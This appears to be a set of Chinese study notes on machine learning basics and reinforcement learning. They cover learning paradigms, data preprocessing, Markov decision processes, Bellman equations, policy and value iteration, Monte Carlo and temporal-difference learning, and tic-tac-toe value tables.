    可以理解为,监督学习标注了 100%,无监督学习标注了 0%,半监督学习标注了 $(0%,100%)$

  • 弱监督学习: 使用不完全、不精确或不完全正确标注的数据。弱强调的是标注不够强(准确),模型通过学习这些低质量的标签来完成一个更困难的任务,从而可以克服标注难度高或噪声大的问题,提高模型泛化能力。

  • 无监督学习:使用不带标签的数据训练模型。有无强调的是是否有标注。

  • 自监督学习:使用数据本身生成的任务进行训练,无需人工标注。

    自监督学习是无监督学习的一种。

数据预处理

  • 数据清理 Data Cleaning:消除错误数据
  • 数据转化 Data Transformation:将数据从一种形式转换为另一种形式,以便更好地进行分析和建模
  • 特征工程 Feature Engineering:从原始数据中提取有用的特征,以提高模型的性能

数据清理(Data Cleaning)

  • 处理缺失值:可以选择删除含有缺失值的行或列,或者用均值、中位数等进行填补。
  • 处理重复数据:删除重复的行,以确保数据的唯一性。
  • 处理异常值:识别并处理数据中的异常值,可以选择删除或替换。

数据转化(Data Transformation)

  • 标准化(Normalization):将数据缩放到一个特定范围,如 $[0, 1]$。
  • 归一化(Standardization):将数据转换为均值为 0,方差为 1 的标准正态分布。
  • 编码(Encoding):将分类变量转换为数值形式,如独热编码 (One-Hot Encoding)。

特征工程(Feature Engineering)

  • 特征选择:选择对模型最有用的特征,去除无关或冗余的特征。
  • 特征提取:从原始数据中提取新的特征,如通过组合现有特征或使用降维技术如 PCA。
  • 特征构造:创建新的特征,如通过数学变换或业务知识。

[^1]: 钰宸y / 全监督,自监督,半监督,弱监督,无监督的关系和区别

💾

马尔可夫决策过程和动态规划

2024年6月12日 12:12

马尔科夫决策过程(Markov Decision Process, MDP)

  • 状态集合: $S$
  • 动作集合: $A$
  • 状态转移函数:$P: \langle S, A, S' \rangle \rightarrow \mathbb{R}^+$
    • $P(s'|s, a)$ 表示在当前状态 $s$ 和动作 $a$ 下,转移到状态 $s'$ 的 概率
  • 奖励函数:$R: \langle S, A, \mathbb{R}^+ \rangle \rightarrow \mathbb{R}^+$
    • $R(s, a, r)$ 表示在当前状态 $s$ 和动作 $a$ 下,获得奖励 $r$ 的 概率

马尔可夫性质:在当前状态 $S_t$ 下,状态转移模型 $P$ 和奖励函数 $R$ 仅与 $S_t$ 有关,和之前的状态及动作无关,也即:

$$ P(S_{t+1} \mid S_t, A_t, S_{t-1}, A_{t-1}, \ldots, S_0, A_0) = P(S_{t+1} \mid S_t, A_t) $$

这条性质可以有力地简化问题。

有限 MDP:状态集合 $S$ 和动作集合 $A$​ 为有限集。

回顾定义

首先,回顾一下上节课讲过的三个公式。

累积收益值 $G_t$

表示从时间步 $t$ 开始的累积收益值。

$$ G_t = R_{t+1} + \gamma R_{t+2} + \gamma^2 R_{t+3} + \cdots = \sum_{k=0}^{\infty} \gamma^k R_{t+k+1} $$

其中,$\gamma$ 是折扣因子,$0 \leq \gamma \leq 1$。$R_t$ 是在时间步 $t$​ 获得的即时奖励。若它不为 1,那么此函数会更关注 近期 的信息,忽略无限远的信息,保证了这个累积收益是 有界 的,不会是正无穷。从而使得策略是可比的。

注意在这个表达式中,越靠右的项,时序关系上越晚、越远(越靠近未来)

状态价值函数 $V_\pi(s)$

表示在策略 $\pi$ 下,处于状态 $s$ 时的期望累积收益值。

$$ V_\pi(s) = \mathbb{E}\pi[G_t \mid S_t = s] = \mathbb{E}\pi[R_{t+1} + \gamma R_{t+2} + \cdots \mid S_t = s] $$

动作价值函数 $Q_\pi(s, a)$

表示在策略 $\pi$ 下,处于状态 $s$ 并采取动作 $a$ 时的期望累积收益值。

$$ Q_\pi(s, a) = \mathbb{E}\pi[G_t \mid S_t = s, A_t = a] = \mathbb{E}\pi[R_{t+1} + \gamma R_{t+2} + \cdots \mid S_t = s, A_t = a] $$

Bellman 期望方程

可以看到,在上述的三个函数中,计算某一状态、某一动作的价值时,没有显式地出现诸如 $t-1$ 的项,但是这并不代表马尔科夫性质得到了满足,因为在计算期望时,并没有显式地提及状态转移的概率。

为此,我们引入 Bellman 期望方程,它是一个递归方程,可以用来计算状态价值函数和动作价值函数。

状态价值函数 $V_\pi(s)$

表示在策略 $\pi$ 下,处于状态 $s$ 时的期望累积收益。

$$ V_\pi(s) = \sum_a \pi(a|s) \sum_{s', r} p(s', r | s, a) [r + \gamma V_\pi(s')] $$

  • $\pi(a|s)$:在状态 $s$ 下选择动作 $a$ 的概率。
  • $p(s', r | s, a)$:在状态 $s$ 下采取动作 $a$ 后转移到状态 $s'$ 并获得奖励 $r$ 的概率。
  • $\gamma$:折扣因子,权衡当前和未来的收益。

动作价值函数 $Q_\pi(s, a)$

表示在策略 $\pi$ 下,处于状态 $s$ 并采取动作 $a$ 时的期望累积收益。

$$ Q_\pi(s, a) = \sum_{s', r} p(s', r | s, a) [r + \gamma V_\pi(s')] $$

同样的,$p(s', r | s, a)$ 表示在状态 $s$ 下采取动作 $a$ 后转移到状态 $s'$ 并获得奖励 $r$ 的概率。

状态价值函数与动作价值函数的关系

状态价值函数可以通过动作价值函数表示:

$$ V_\pi(s) = \sum_a \pi(a | s) Q_\pi(s, a) $$

即在状态 $s$ 下的期望累积收益等于所有可能动作的加权期望累积收益,权重为在状态 $s$​ 下采取各动作的概率。

这些式子指出一个特点:所有的转移概率 $p(s', r | s, a)$ 和策略 $\pi(a|s)$ 都仅依赖于当前的状态 $s$ 和动作 $a$,而与更之前的状态和动作无关。这就是马尔可夫性质,即未来状态和奖励只依赖于当前的状态和动作

状态价值和最优策略

最优状态价值 $V^*(s)$:在所有可能的策略 $\pi$ 中最大的累积收益。可以简称为 状态价值

$$ V^*(s) = \max_{\pi} V_\pi(s) $$

最优策略 $\pi^*$:从状态 $s$​​ 出发执行该策略可以获得状态价值的策略。

状态价值只有一个,但是最优策略可以有多个纯策略或者最优纯策略的任意组合。

可以通过反证证明,任意一个最优策略,其对于整个状态空间中任意一个状态都是最优的。

动作价值和最优策略

最优动作价值 $Q^*(s, a)$:在所有可能的策略 $\pi$ 中最大的累积收益。可以简称为 动作价值

$$ Q^*(s, a) = \max_{\pi} Q_\pi(s, a) $$

最优策略 $\pi^*$:从状态 $s$ 出发,采取动作 $a$ 之后执行该策略可以获得动作价值的策略。

动作价值也只有一个,但是最优策略可以有多个纯策略或者最优纯策略的任意组合。

可以证明,任意一个最优策略,其对于整个状态空间中任意一个状态和动作的组合都是最优的,也即 全局最优解一定也是局部最优解,这正是马尔科夫性质的体现,这显著简化了计算复杂度,我们不需要考虑全局的状态,而只需要考虑多次局部状态即可。

Bellman 最优方程

最优价值函数 $V^(s)$ 和最优动作价值函数 $Q^(s, a)$ 满足如下关系:

$$ V^*(s) = \max_{\pi} V_{\pi}(s) $$

$$ Q^*(s, a) = \max_{\pi} Q_{\pi}(s, a) $$

由此可得:

$$ V^(s) = \max_{a} \sum_{s', r} p(s', r | s, a) [r + \gamma V^(s')] = \max_a Q^*(s, a) $$

$$ Q^(s, a) = \sum_{s', r} p(s', r | s, a) [r + \gamma \max_{a'} Q^(s', a')] $$

这两个式子暗含了动作价值 / 状态价值的唯一性,这是迭代 / 递归关系的基础。

用动态规划方法求解最优策略

这对应状态转移函数和奖励函数 $P,R$ 已知的情况,也就是是说 环境已知

动态规划理论

  1. 多阶段决策过程
    • 物理系统的 状态(state) 用一组状态变量描述。
    • 决策(decisions) 引起状态变量的 转换(transformations)
    • 各个阶段的决策与状态转换,在阶段间是独立的,但是整个过程的目标是 最大化最终状态参数 的相关函数。
  2. 无后效性
    • 考虑一个中间状态,决策时不关心之前的状态转换过程,只从当前状态出发。
    • 这种特性称为 无后效性
  3. 最优原则
    • 最优策略的性质:无论初始状态和最初的几个决策是什么,剩余决策一定构成一个与之前决策产生的状态相关的最优策略。
    • 形式化描述:策略 $\pi(a|s)$ 达到状态 $s$ 下的最优值 $v_{\pi}(s) = v^(s)$,当且仅当:对于从状态 $s$ 出发可达到的任意状态 $s'$,策略 $\pi$ 能达到新状态 $s'$ 的最优值 $v_{\pi}(s') = v^(s')$​。

num_triangle

考虑在这个三角形中找到一个从顶部到底部某一节点的路径,使得经过的节点和最大。

  1. 如果不限定各层之间的关联,那么是无后效性的
  2. 如果限定下一层只能在上一层直接相连(最近)的左右子节点中选,那么是有后效性的,譬如第二次选了 8,那么第三层就只能选择 1 或者 0,这相比第二层选了 3 第三次选 8 是更劣的。

单源最短路径问题 Bellman-Ford 算法

  1. 问题定义
    • 给定一个带权有向图 $G=(V, E)$,其中每条边的权是一个实数。
    • 计算从源点(起点)到其他所有顶点的最短路径长度,称为单源最短路径问题。
  2. 算法步骤
    • 初始化:源点距离设为 0,其他顶点距离设为 $\infty$。
    • 进行 $n-1$ 次松弛操作,每次遍历所有边 $(u, v) \in E$,如果有更小的更新距离 $Distance(v)$。这一步基于最长路径不会超过 $n-1$ 条边的结论,其可反证。
    • 检查是否存在负权环,如果存在则返回负权环信息。

策略估值 (Policy Evaluation)

策略估值:对于任意策略 $\pi$,计算在此策略下的状态值函数 $V_\pi$。

策略估值的 Bellman 方程

准确稳定 的状态值函数:

$$ v_\pi(s) = \sum_{a} \pi(a|s) \sum_{s',r} p(s', r | s, a) [r + \gamma v_\pi(s')] $$

但是这个式子是迭代嵌套 $v_\pi$ 这个状态价值函数的,可以发现对于它可能会因为整体到终态的路径很长,嵌套很深,导致计算困难。

迭代更新规则

$$ v_{k+1}(s) = \sum_{a} \pi(a|s) \sum_{s',r} p(s', r | s, a) [r + \gamma v_k(s')] $$

其中:

  • $v_{k}(s')$ 是第 $k$ 次迭代时,状态 $s'$ 的值。一个迭代阶段中,所有的状态都有一个估值(但它们不一定准确),每次更新所有状态的估值
  • $v_{k+1}(s)$ 是第 $k+1$ 次迭代时,状态 $s$​​ 的值
  • 状态 $s'$ 是状态 $s$ 的可能后继状态之一

这个式子是 不准确 的,因为我们无法保证 $v_{k}(s') = v_\pi(s')$,只是在通过不断迭代 $k$ 去更新估计值,而接近真实值。

迭代策略估值 (Iterative Policy Evaluation)

  • 完全回溯(Full Backup)

    根据被评估策略 $\pi$ 所有可能的一步转移,用 $v_k(s)$ 依次计算 $v_{k+1}(s), \forall s \in S$。

  • 迭代停止条件

    测试 $\max_{s \in S} |v_{k+1}(s) - v_k(s)|$​,当这个量足够小时停止(这意味着收敛了),也即所有估值不再变化,达到了 $v_\pi$ 这个更新规则的不动点

  • 迭代内循环计算

    • 同步迭代(Synchronous Iteration)
    • 异步迭代(Asynchronous Iteration)
同步迭代(Synchronous Iteration)

计算过程:

  • 已有 $v_k(s_1), v_k(s_2), \cdots, v_k(s_n)$
  • 用上述值依次计算 $v_{k+1}(s_1), v_{k+1}(s_2), \cdots, v_{k+1}(s_n)$
  • 需要双数组分别存储旧值和新值。
异步迭代(Asynchronous Iteration)

计算过程:

  • 用 $v_k(s_1), v_k(s_2), \cdots, v_k(s_n)$ 计算 $v_{k+1}(s_1)$
  • 用 $v_{k+1}(s_1), v_k(s_2), \cdots, v_k(s_n)$ 计算 $v_{k+1}(s_2)$
  • 用 $v_{k+1}(s_1), v_{k+1}(s_2), \cdots, v_k(s_n)$ 计算 $v_{k+1}(s_3)$

只需 单数组 原位更新,可以更快地收敛。

伪代码

$$ \begin{aligned} &\text{Input }\pi,\text{the policy to be evaluated}\ &\text{Initialize an array }V(s)=0,\text{for all }s\in\mathcal{S}\ &\text{Repeat}\ &\quad\Delta\leftarrow0\ &\quad\text{For each }s\in\mathcal{S}{:}\ &\quad\quad v\leftarrow V(s)\ &\quad\quad V(s)\leftarrow\sum_{a}\pi(a|s)\sum_{s^{\prime},r}p(s^{\prime},r|s,a)\big[r+\gamma V(s^{\prime})\big]\ &\quad\quad\Delta\leftarrow\max(\Delta,|v-V(s)|)\&\text{until }\Delta<\theta\text{ (a small positive number)}\&\text{Output }V\approx v_{\pi}\end{aligned} $$

  1. 输入策略 $\pi$:输入一个策略 $\pi$,这个策略定义了在每个状态 $s$ 下选择动作 $a$ 的概率。

  2. 初始化:初始化一个值函数数组 $V(s)$,对所有状态 $s$ 设初值为 0。

  3. 迭代计算

    • 设置一个变量 $\Delta$ 用于记录值函数的最大变化量,初始值为 0。
    • 对于每一个状态 $s$,执行以下步骤:
      • 保存当前状态 $s$ 的值函数 $V(s)$ 到变量 $v$。
      • 使用策略 $\pi$ 和状态转移概率 $p(s', r|s, a)$ 更新状态 $s$ 的值函数 $V(s)$。公式为: $V(s) \leftarrow \sum_{a} \pi(a|s) \sum_{s', r} p(s', r|s, a) [r + \gamma V(s')]$
      • 更新 $\Delta$,记录当前值函数 $V(s)$ 与之前值函数 $v$ 的最大差值,$\Delta \leftarrow \max(\Delta, |v - V(s)|)$。这句话保证了 $\Delta$ 是所有状态中的误差最大值。
  4. 终止条件:当 $\Delta$ 小于某个很小的正数 $\theta$ 时,迭代停止,表示值函数已经收敛。

  5. 输出:输出收敛后的值函数 $V$,该值函数近似于策略 $\pi$ 的值函数 $v_\pi$。

$v_\pi$​ 的存在性和唯一性保障条件

满足下述条件之一:

  1. $\gamma < 1$ ,这保证了远处传递过来的值(未来收益)随着距离的增加,权重逐渐衰减为 0。试想如果 $\gamma=1$,那就意味着未来的收益和当前的收益一样重要,累积的收益可能无穷大,从而无法保证值函数 $v_\pi$ 的收敛性。

  2. 依据策略 $\pi$,所有状态最终能保证终止。

    这意味着不会有无穷长的路径存在,无论初始状态是什么,对弈都会在有限步内结束,这保证了未来的奖励是有限的。

    如果策略 $\pi$​ 是有限步的,那么此条件立刻得到满足。一个例子是 Bellman-Ford 算法,由于一条最长无环路径不会超过 $n-1$​ 条边,所以迭代一定是有次数上限的,也即迭代是有限步的。

迭代策略估值

收敛性条件:在上述存在性和唯一性保障条件下,迭代策略估值是收敛的。

  • 值函数序列收敛:随着迭代次数 $k$ 增加,值函数序列 ${V_k}$ 会收敛,即 $V_k \to v_\pi$。
  • 稳定的值函数:即使迭代了很多次,也能得到一个稳定的关于策略 $\pi$ 的值函数 $v_\pi$​。

策略提升(Policy Improvement)

策略提升:在原策略基础上,根据原策略计算得到的值函数,贪心地选择动作使得新策略的估值优于原策略,或者一样好。

先前讲的策略估值从未改变过策略本身,它只是在更新策略的状态价值表。而 策略提升会更新策略。

计算动作价值

可以根据状态价值计算动作价值:

$$ q_{\pi}(s, a) = \sum_{s', r} p(s', r | s, a) [r + \gamma v_{\pi}(s')] $$

产生新策略

贪心选择动作产生新策略:

$$ \pi'(s) = \arg\max_{a} q_{\pi}(s, a) $$

即:

$$ \pi'(s) = \arg\max_{a} \sum_{s', r} p(s', r | s, a) [r + \gamma v_{\pi}(s')] $$

策略提升总结

  • 在某个状态 $s$ 下,找到一个比 $\pi$ 原有的动作价值函数 $q_\pi$ 更好的 $q_{\pi'}$,在所有遇到状态 $s$ 时,用它对应的策略替代原来的 $\pi$,得到新的 $\pi'$
  • 因为其他状态的动作都保持不变,对于所有状态 $s$,$V_{\pi'}(s) = \sum_a \pi'(a | s) Q_{\pi'}(s, a)$ 一定比 $V_{\pi}(s)$​ 要好,策略得到提升

一个很容易想到的策略提升是,在所有 $s$ 下,贪心选择 $q$ 最好的动作,完成一次更有效的策略提升

  • 如果有多个 $q$ 序列最好的,可以在这些 $q$ 里随机选
  • 策略提升后,状态价值对新策略估计的就不准确了,需要重新估计 $v_{\pi'}$

策略迭代

策略迭代:交替进行迭代策略估值和策略提升,在有限步之后找到最优策略与最优值函数。

$$ \pi_0 \xrightarrow{E} v_{\pi_0} \xrightarrow{I} \pi_1 \xrightarrow{E} v_{\pi_1} \xrightarrow{I} \pi_2 \xrightarrow{E} \cdots \xrightarrow{I} \pi^* \xrightarrow{E} v^* $$

其中,$\xrightarrow{E}$ 代表策略估值,$\xrightarrow{I}$​ 代表策略提升。

以上交替进行会得到策略序列 ${\pi}$,由于之前已经证明策略提升中新策略一定优于旧策略,或者一样好,故策略序列单调更优。

伪代码

  1. 初始化

    $$ V(s) \in \mathbb{R} \text{ and } \pi(s) \in \mathcal{A}(s) \text{ arbitrarily for all } s \in \mathcal{S} $$

  2. 策略估值

    $$ \begin{aligned} &\text{Repeat}\ &\quad \Delta \leftarrow 0\ &\quad \text{For each } s \in \mathcal{S}:\ &\quad\quad v \leftarrow V(s)\ &\quad\quad V(s) \leftarrow \sum_{s', r} p(s', r | s, \pi(s)) [r + \gamma V(s')]\ &\quad\quad \Delta \leftarrow \max(\Delta, |v - V(s)|)\ &\text{until } \Delta < \theta \text{ (a small positive number)} \end{aligned} $$

  3. 策略提升

    $$ \begin{aligned} &\text{policy-stable} \leftarrow \text{True}\ &\text{For each } s \in \mathcal{S}:\ &\quad \text{old-action} \leftarrow \pi(s)\ &\quad \pi(s) \leftarrow \arg\max_a \sum_{s', r} p(s', r | s, a) [r + \gamma V(s')]\ &\quad \text{If } \text{old-action} \ne \pi(s), \text{ then policy-stable} \leftarrow \text{False}\ &\text{If policy-stable, then stop and return } V \approx v_* \text{ and } \pi \approx \pi_*; \text{ else go to 2} \end{aligned} $$

策略提升结束条件

假设新策略 $\pi'$ 和旧策略 $\pi$ 一样好,则有 $v_{\pi} = v_{\pi'}$,此时,对所有 $s$ 都有:

$$ \begin{aligned} v_{\pi'}(s) &= \max_a \sum_{s', r} p(s', r | s, a) [r + \gamma v_{\pi}(s')] \ &= \max_a \sum_{s', r} p(s', r | s, a) [r + \gamma v_{\pi'}(s')] \end{aligned} $$

与 Bellman 最优方程相同,因此 $v_{\pi'}$ 一定是当前最优状态值函数 $v^*$,则 $\pi'$ 和 $\pi$ 一定都是最优策略。

值迭代(Value Iteration)

策略迭代的问题

  • 策略估值耗费时间
  • 随着策略估值、提升的多次迭代,在后面的迭代中,对于某些状态,依据策略选择的动作已经是最优的了,此时策略估值不再改变(最优意味着即使再经过策略提升后,其动作也不会改变,只会进一步更新估值),对策略提升都没有帮助
  • 所以可以提前截断估值

自然地,我们想到一种极端的修正方式

  • 只做一次估值,不需要估值收敛就开始策略提升
  • 这就是 值迭代方法

$$ v_{k+1}(s) = \max_a \sum_{s', r} p(s', r | s, a) \left[ r + \gamma v_k(s') \right] $$

在值迭代中,每次更新直接计算在状态 $s$ 下采取所有可能的动作 $a$ 的 期望 回报,并取其最大值作为新的状态值。这个过程 同时完成了值函数更新和策略提升。与之相对的,在策略迭代中,评估和提升是两个独立的步骤。

  • 策略迭代:每次策略提升前需要完全评估当前策略,可能需要多次迭代(策略评估目的是计算策略估值表,计算过程是循环的,终止条件是估值稳定 / 收敛 ),计算开销较大
  • 值迭代:每次迭代直接更新值函数,通常收敛速度更快。值迭代通常计算效率更高,因为它 减少了评估步骤的迭代次数

值迭代算法伪代码

$$ \begin{aligned} &\text{Algorithm parameter: a small threshold } \theta > 0 \text{ determining accuracy of estimation} \ &\text{Initialize } V(s), \text{ for all } s \in S^+, \text{ arbitrarily except that } V(\text{terminal}) = 0 \ &\text{Loop:} \ &\quad \Delta \leftarrow 0 \ &\quad \text{Loop for each } s \in S: \ &\quad\quad v \leftarrow V(s) \ &\quad\quad V(s) \leftarrow \max_a \sum_{s', r} p(s', r | s, a) \left[ r + \gamma V(s') \right] \ &\quad\quad \Delta \leftarrow \max(\Delta, |v - V(s)|) \ &\text{until } \Delta < \theta \ &\text{Output a deterministic policy, } \pi \approx \pi_*, \text{ such that } \ &\quad \pi(s) = \arg\max_a \sum_{s', r} p(s', r | s, a) \left[ r + \gamma V(s') \right] \end{aligned} $$

value_iteration_and_policy_iteration_comparison

下面给出一个基于全连接层图示的、更为直观的理解:

考虑我们现有的一个状态 $s$,他的后继状态为绿色圆圈,绿色圆圈的后继状态为红色圆圈,蓝色是动作:

fc

对于策略迭代中的策略提升,我们:

  1. 根据所有红色圆圈的估值,依据动作概率加权
  2. 更新所有的绿色圆圈的估值
  3. 根据更新后的绿色圆圈估值,依据动作概率加权
  4. 更新 $s$ 的估值

那么,在两次策略评估的迭代之间,一旦任意一个绿色圆圈发生了改变,其势必影响到所有可以转移到他的、上游的黄色圆圈们,造成更新。这会导致策略评估的迭代次数很多。

但是对于值迭代:

  1. 根据所有红色圆圈,选择最大的估值,直接更新绿色圆圈估值
  2. 根据更新后的绿色圆圈估值,选择最大的估值,直接更新 $s$ 的估值

fc_2

可以看到,由于选择了最大的估值,所以只要最大的估值对应的状态的估值没有发生改变,那么上游的黄色圆圈就不会变动估值,也就不会更新算法中指征收敛状态的 $\Delta$​,于是收敛会加快。

值迭代算法的收敛性分析

引理:压缩映射定理,一个压缩映射最多有一个不动点(压缩映射定理是闭区间套定理的直接推广)。

证明:

$$ \Delta = \max_s | V_{i+1}(s) - V_i(s) | = ||V_{i+1} - V_i|| \quad \text{一轮值迭代中估值变化最大值,}\ \text{where }||V||=\max_S|V(s)| $$

$$ V_{i+1}(s) = \max_a \left( R + \gamma V_i(s') \right) $$

$$ V_{i+2}(s) \leq \max_a (R + \gamma V_i(s') + \gamma \Delta) $$

$$ V_{i+2}(s) - V_{i+1}(s) \leq \max_a (R + \gamma V_i(s') + \gamma \Delta) - \max_a (R + \gamma V_i(s')) = \gamma \Delta $$

所以,

$$ ||BV_{i+1} - BV_i|| \leq \gamma ||V_{i+1} - V_i||\ \text{where }BV_{i+1}(s) = \max_a \left( R(s, a) + \gamma V_i(s') \right) $$

所以值迭代算法(贝尔曼更新)是 压缩映射,从而其最多有一个不动点,也就是说,值迭代算法收敛。

广义策略迭代(Generalized Policy Iteration)

generalized_policy_iteration

用采样方法逼近最优策略

这对应状态转移函数和奖励函数 $P,R$ 未知的情况,也就是说 环境 未知。

Bootstrap

Bootstrap(自举) 是一种统计方法,用于估计样本的分布。它通过反复从原始数据集中 有放回地抽样,生成多个子样本,然后 计算这些子样本的统计量来估计总体的统计性质

在强化学习中,bootstrap 是指 计算一个状态的估值是依据它的后继状态的估值

蒙特卡洛学习

蒙特卡洛学习方法用于强化学习中,它不需要环境的转移概率($P$)和奖励函数($R$​)的知识。

蒙特卡洛学习方法假设环境未知,不使用 bootstrap

蒙特卡洛方法通过多次模拟整个过程( 直到终止状态 ),然后利用实际获得的总回报来更新状态值。公式表示为:

$$ V(s) = \frac{1}{N} \sum_{i=1}^{N} G_i $$

其中,$G_i$ 是第 $i$ 次模拟的总回报,$N$​​​ 是模拟次数。

没有复杂的状态转移关系、计算估值这种精确但是慢的很的玩意,就是硬尝试,至于准确性?交给大数定理。

时序差分学习

时序差分学习结合了动态规划和蒙特卡洛方法的优点,它依赖于后续状态的估值来更新当前状态的估值,但不需要知道环境的转移概率($P$)和奖励函数($R$)。

时序差分学习方法假设环境未知,但是使用 bootstrap

它通过每一步的估值误差来更新状态值,公式表示为:

$$ V(s) \leftarrow V(s) + \alpha [R + \gamma V(s') - V(s)] $$

其中,$\alpha$ 是学习率,$\gamma$ 是折扣因子,$R$ 是当前奖励,$V(s')$​ 是后继状态的估值。

总结

下表重要,要记住。

summary

summary_2

Credit

dadadaplz / 策略迭代与值迭代的区别

💾

强化学习基本思想和问题模型

2024年6月7日 01:50

强化理论

强化理论(Reinforcement Theory):强化理论是一种行为学习理论,认为行为可以通过奖赏和惩罚来改变。

  1. 通过奖励和惩罚的方式可以改变智能体的行为方式
    • 这是强化理论的基本思想。通过提供奖励(正强化)或惩罚(负强化),可以影响智能体的行为,使其趋向于某种特定的行为模式。
    • 正强化:当智能体表现出期望行为时,给予 奖励,从而增加该行为的发生频率。
    • 负强化:当智能体表现出不期望行为时,给予 惩罚,从而减少该行为的发生频率。
  2. 随机奖励可以使智能体上瘾
    • 随机奖励指的是 不确定何时会获得奖励的机制。研究表明,这种不确定性会使智能体更投入于某种行为,因为它们总是期待下一次可能的奖励。
    • 这种机制在现实生活中也很常见,例如赌博和某些电子游戏中,随机奖励机制会让人上瘾。
    • 这里不在课程范围

reinforcement_model

问题建模

环境(问题模型)

  1. 初始状态 $S_0$ (state)

  2. 当前玩家 $C$ (current player (s))

  3. 动作 $A$ (action):智能体在某个状态下的合法动作集合。

  4. 状态转移 $P$ (transition)

    $P(S_{t+1} \mid S_t, A_t)$ 用以表示环境,表示在时间 $t$ 时刻,智能体在状态 $S_t$ 下采取动作 $A_t$ 后,转移到下一时刻状态 $S_{t+1}$ 的概率。

    衡量一个环境的 复杂程度:某个状态下,智能体采取某个动作后,转移到下一个状态的状态转移模型。可能到达的所有状态构成了 状态空间 (state space)。所有状态下可行动作,构成 动作空间 (action space)。

    由此可见,状态转移的不确定性可能来自环境(来自 $P$ 的数值本身),也可能来自策略(来自 $P$ 的参数 $A$)。

  5. 终止状态 $S_T$ (terminate state)

  6. 奖励 $R$ (reward)

    $R_t \leftarrow S_t, A_t$,表示智能体在时间 $t$ 时刻,状态为 $S_t$ 并采取动作 $A_t$ 后获得的即时奖励。

    也即某个状态下,智能体采取某动作后得到的分数。

智能体(问题的解)

策略 $\pi$

  • $A_t \leftarrow \pi(S_t)$ 用以表示智能体的策略,也即在每一个状态 $S_t$ 下选择动作 $A_t$ 的规则或函数。
  • 策略 $\pi$ 是状态 $S$ 到动作 $A$ 的映射关系,给出了智能体在状态 $S$ 下如何选择动作 $A$ 的决策方法。
  • 注意:策略 $\pi$​ 是 全局性 的,任何状态下都要能够给出动作选择。
  • 确定性策略 $\pi$:对于每个状态 $s \in S$,策略 $\pi(s)$ 总是返回一个确定的动作 $a \in A$。

目标(问题的解)

  • 寻找 最优策略 $\pi$,使得从初始状态 $S_0$ 到终止状态 $S_T$ 的累计收益 $G$ (gain) 最大
  • $G = \sum_{i=1}^T R_i$,表示智能体从初始状态到终止状态过程中所获得的总奖励

井字棋问题建模

与先前学习的假设对弈双方都是最聪明(双方都采用最优策略)的 MINIMAX 算法不同,强化学习仅仅假设:

  1. 敌人采用的是 确定性策略 (给定 $S$ 下有确定的 $A$,而不是随机的 $A$),但是不一定是最优策略。
  2. 我们可以和敌人进行 多次对弈,从而学习到一个好的对敌策略。

显然,这样的假设更为真实,因为我们能够利用真实情况中,敌人决策的失误来对应的调整我们的策略。

问题建模

  1. 初始状态 $s_0$:空棋盘

  2. 当前玩家:轮到下子的一方(也可以把对手建模在环境里,每次状态转移返回的状态是 对手已经落子后的状态,这样游戏就是单人游戏,否则就是双人游戏)

  3. 动作 $A$:落子到当前为空的位置

  4. 状态转移 $P$:落子之后的棋盘状态(转移到下一个状态)

  5. 终止状态 $s_T$:棋盘满或一方获胜,表示游戏结束的状态。

  6. 奖励 $R$:终止状态,胜者 +1,负者 -1,战平双方均为 0;还没到终止状态的状态(下棋过程中),其奖励为 0

解和目标

策略 $\pi$

使用 状态估值表,每个状态一个入口(表项),记录从该状态出发到终局的胜率。根据状态估值表选择动作。

  • 学习策略 $\pi_1$:大概率选择估值最高的下一个状态,小概率随机选一个动作(探索)

  • 目标策略 $\pi^*$:每次选择通往估值最高的下一个状态(贪心)的动作,也即表示在每个状态下选择最优动作的规则。

目标(问题的解)

最优策略 $\pi^*$:使得智能体从初始状态 $S_0$ 下到最终的效率 / 胜率最大

训练过程

第一步:建立状态估值表(值函数表)

对于井字棋问题,其 状态空间比较小 (一个粗略的估计是不超过 $3^9$,每个空可以有 X / O / 空三种状态,但是显然其中还有大量不合法的操作),我们可以用表格存下各个状态的估值。每个状态一个估值,估值表示这个状态到最终的胜率。

我们可以令整个表就是值函数,并在接下来的过程中逐步更新它。

估值表函数初值:(根据游戏规则)

  • 三个 X 连成一线的状态,价值为 1,因为我们已经贏了。
  • 三个 O 连成一线的状态,价值为 0,因为我们已经输了。
  • 其他状态的值都为 0.5,表示有 50% 的概率能贏。

第二步:和对手玩很多次

目的:让值函数(估值表)更准确

  1. 利用:大概率贪心选价值最大的地方下
  2. 探索:偶尔随机地选择以便探索之前没有探索过的地方

利用和探索要平衡

值函数表 决定了我们的策略,改进值函数表就改进了策略。

第三步:边下边修改状态的值

$$ V(S_t) \leftarrow V(S_t) + \alpha [V(S_{t+1}) - V(S_t)] $$

其中 $α$ 是一个小的正的分数,称为步长参数,或者学习率。

  • 初值 $S_0$​:只有终局的价值是正确的,中间局面的价值都是估计值 0.5(而这是错的)
  • 过程中:状态价值从后面向前传导
  • 分析:假设我们一直在一条路径上反复走,每走到终点一次,终局价值至少向上传一步,走多了终将把这个终局的输赢带到最上面的初始节点,于是我们在初始节点就会知道最后的输赢
  • 通过学习 $V(s)$ 可以得到策略最优策略 $\pi^*$

小结

  1. 与上节课 minimax 相比,不再假设对手使用最优策略

  2. 将对手建模在环境里:每次采取动作后面临的状态(环境返回的更新后的状态)都是对手执行完它的动作后的新状态,从而建模成单智能体问题。

    也可以建模成多智能体博弈问题,有一个对手决策模型,轮到对手落子时让对手模型决策

  3. 用值函数表存储状态估值 / 值函数表 $V(S)$

  4. 通过不断对弈更新值函数表

  5. 根据值函数表,可以得到贪心选最优动作 $\pi^*$

问题模型的泛化和分析

环境(问题模型)

  1. 初始状态 $S_0$ (state)
  2. 当前玩家 $C$ (current player (s))
  3. 动作 $A$ (action)
  4. 状态转移 $P$ (transition)
  5. 终止状态 $S_T$ (terminate state)
  6. 奖励 $R$ (reward)

智能体

  1. 策略 $\pi$
  2. 目标(问题的解) 最大化期望累积收益 $G$

环境:状态转移模型 $P$ 和奖励 $R$

状态转移 $P$​

不一定是确定性的,可以按 概率 状态转移

$P$:状态转移函数 $\langle S, A, S' \rangle \rightarrow \mathbb{R}^+ $,$P(s, a, s') = \Pr[s' \mid s, a]$

这里 $s$ 和 $a$ 是当前状态和动作,$s'$ 是下一个状态。返回的是一个概率。$\langle \rangle$ 尖括号代表一个元组。

对于任意 $s, a$,有 $\sum_{s'} P(s, a, s') = 1$ 。也即,给定 $S$ 所有可行动作 $A$ 下的状态概率之和为 1

奖励 $R$​

也不一定是确定性的,可以是一个 概率 奖励

$R$:奖励函数 $\langle S, A, \mathbb{R}^+ \rangle \rightarrow \mathbb{R}^+ $,$R(s, a, r) = \Pr[r \mid s, a]$

